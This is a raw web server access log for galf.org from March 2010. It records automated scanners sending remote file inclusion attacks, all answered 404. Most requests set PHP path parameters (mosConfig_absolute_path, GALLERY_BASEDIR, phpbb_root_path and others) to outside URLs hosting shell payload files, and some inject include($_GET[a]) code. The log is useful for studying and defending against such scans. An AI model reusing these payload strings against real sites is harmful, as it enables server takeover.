123.143.29.250 - - [01/Mar/2010:02:31:36 -0800] "GET //bbs//delete_all.php?board_skin_path=http://www.native79.com/utfboard///bbs///////id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:02:31:38 -0800] "GET /logs///bbs//delete_all.php?board_skin_path=http://www.native79.com/utfboard///bbs///////id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:02:31:53 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:02:31:53 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:02:31:53 -0800] "GET /logs/access_091221.log%20%20//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [01/Mar/2010:02:32:51 -0800] "GET /logs/access_091214.log/?INCLUDE_FOLDER=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [01/Mar/2010:02:34:59 -0800] "GET /logs/access_100125.log/?INCLUDE_FOLDER=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.108.237.12 - - [01/Mar/2010:02:36:00 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.108.237.12 - - [01/Mar/2010:02:36:00 -0800] "GET /logs/access_091228.log//faqsupport/samplefaqsupport.php?path[docroot]=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.108.237.12 - - [01/Mar/2010:02:36:00 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:02:36:57 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:02:36:57 -0800] "GET /logs/access_091221.log%20%20//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:02:36:57 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [01/Mar/2010:02:37:05 -0800] "GET /components/com_forum/download.php?phpbb_root_path=[Shell]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [01/Mar/2010:02:37:05 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=[Shell]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [01/Mar/2010:02:37:05 -0800] "GET /logs/access_100104.log%20%20//components/com_forum/download.php?phpbb_root_path=[Shell]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [01/Mar/2010:02:37:21 -0800] "GET /components/com_forum/download.php?phpbb_root_path=[Shell]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [01/Mar/2010:02:37:21 -0800] "GET /logs/access_100104.log%20%20//components/com_forum/download.php?phpbb_root_path=[Shell]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [01/Mar/2010:02:37:21 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=[Shell]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [01/Mar/2010:02:37:32 -0800] "GET /logs/access_100118.log%20%20//components/com_forum/download.php?phpbb_root_path=[Shell]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.15.152.132 - - [01/Mar/2010:02:37:41 -0800] "GET /logs/access_100118.log%20%20//components/com_forum/download.php?phpbb_root_path=[Shell]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.167.78 - - [01/Mar/2010:02:37:58 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.167.78 - - [01/Mar/2010:02:37:58 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.167.78 - - [01/Mar/2010:02:37:59 -0800] "GET /logs/access_091026.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:38:49 -0800] "GET /logs/access_100125.log/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:38:53 -0800] "GET /logs/access_100125.log/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.150.78.218 - - [01/Mar/2010:02:38:57 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.150.78.218 - - [01/Mar/2010:02:38:57 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.150.78.218 - - [01/Mar/2010:02:38:57 -0800] "GET /logs/access_091228.log//faqsupport/samplefaqsupport.php?path[docroot]=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:38:57 -0800] "GET /logs/access_100125.log/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:40:20 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:40:20 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:40:20 -0800] "GET /logs/access_100118.log%20%20//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:40:20 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:40:20 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:40:20 -0800] "GET /logs/access_100118.log%20%20//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:02:40:30 -0800] "GET /logs/access_100104.log%20%20//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:02:40:30 -0800] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:02:40:30 -0800] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:02:40:33 -0800] "GET /logs/access_091221.log//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:40:33 -0800] "GET /logs/access_091221.log%20%20//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:40:34 -0800] "GET /logs/access_091221.log%20%20//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:02:40:43 -0800] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:02:40:43 -0800] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:02:40:43 -0800] "GET /logs/access_100104.log%20%20//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:02:40:50 -0800] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:02:40:50 -0800] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:02:40:50 -0800] "GET /logs/access_100104.log%20%20//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:02:40:59 -0800] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:02:40:59 -0800] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:02:40:59 -0800] "GET /logs/access_100104.log%20%20//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:02:41:43 -0800] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:02:41:43 -0800] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:02:41:43 -0800] "GET /logs/access_100104.log%20%20//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.167.78 - - [01/Mar/2010:02:42:24 -0800] "GET /logs/access_091116.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:02:43:04 -0800] "GET /logs/access_100125.log//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:02:43:12 -0800] "GET /logs/access.log///bbs//delete_all.php?board_skin_path=http://www.native79.com/utfboard///bbs///////id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
123.143.29.250 - - [01/Mar/2010:02:43:13 -0800] "GET //bbs//delete_all.php?board_skin_path=http://www.native79.com/utfboard///bbs///////id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
220.232.247.197 - - [01/Mar/2010:02:43:14 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:02:43:14 -0800] "GET /logs///bbs//delete_all.php?board_skin_path=http://www.native79.com/utfboard///bbs///////id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
220.232.247.197 - - [01/Mar/2010:02:43:14 -0800] "GET /logs/access_091026.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.232.247.197 - - [01/Mar/2010:02:43:14 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:02:44:28 -0800] "GET /logs/access_091221.log//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.232.247.197 - - [01/Mar/2010:02:45:12 -0800] "GET /logs/access_091116.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [01/Mar/2010:02:46:41 -0800] "GET /logs/access_100125.log//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:48:20 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:48:20 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:48:20 -0800] "GET /logs/access_091221.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:48:20 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:48:20 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:48:20 -0800] "GET /logs/access_091221.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.167.78 - - [01/Mar/2010:02:48:31 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.167.78 - - [01/Mar/2010:02:49:18 -0800] "GET /logs/access_091026.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:52:06 -0800] "GET /logs/access_091228.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [01/Mar/2010:02:52:07 -0800] "GET /logs/access_091228.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [01/Mar/2010:02:53:49 -0800] "GET /logs/access_091221.log//core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [01/Mar/2010:02:53:49 -0800] "GET /core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [01/Mar/2010:02:53:49 -0800] "GET /logs//core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [01/Mar/2010:02:53:51 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [01/Mar/2010:02:53:51 -0800] "GET /logs/access_091221.log%20%20//init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [01/Mar/2010:02:53:51 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:02:55:07 -0800] "GET /logs//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
123.143.29.250 - - [01/Mar/2010:02:55:08 -0800] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
123.143.29.250 - - [01/Mar/2010:02:55:12 -0800] "GET /logs/access.log%20%20//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
123.143.29.250 - - [01/Mar/2010:02:55:48 -0800] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:02:55:48 -0800] "GET /logs//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:02:55:48 -0800] "GET /logs/access_091221.log%20%20//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [01/Mar/2010:02:56:20 -0800] "GET /logs/access_100111.log//core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [01/Mar/2010:02:56:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [01/Mar/2010:02:56:26 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [01/Mar/2010:02:56:28 -0800] "GET /logs/access_090907.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.167.78 - - [01/Mar/2010:02:57:01 -0800] "GET /logs/access_091228.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://mapotuntun.co.kr/data/admins/tmp/logs/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.111.95.42 - - [01/Mar/2010:02:57:05 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.meuveiculonovo.com//includes/Cache/ts?????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
193.111.95.42 - - [01/Mar/2010:02:57:05 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.meuveiculonovo.com//includes/Cache/ts?????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
200.93.147.154 - - [01/Mar/2010:02:57:37 -0800] "GET /logs/access_100118.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:57:41 -0800] "GET /index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:57:42 -0800] "GET /logs/access_091102.log//index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:57:42 -0800] "GET /logs//index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:57:44 -0800] "GET /logs/access_091102.log//index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:57:44 -0800] "GET /index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:57:44 -0800] "GET /logs//index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:58:14 -0800] "GET /index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:58:14 -0800] "GET /logs//index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:58:15 -0800] "GET /logs/access_091102.log//index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:58:54 -0800] "GET /index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:58:54 -0800] "GET /logs/access_091102.log//index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.73.168.38 - - [01/Mar/2010:02:58:54 -0800] "GET /logs//index.php?classified_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [01/Mar/2010:03:00:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [01/Mar/2010:03:00:50 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [01/Mar/2010:03:00:52 -0800] "GET /logs/access_090907.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:03:01:05 -0800] "GET /logs//core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:03:01:05 -0800] "GET /core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:03:01:09 -0800] "GET /logs/access_091221.log%20%20//core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:03:01:25 -0800] "GET //write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt???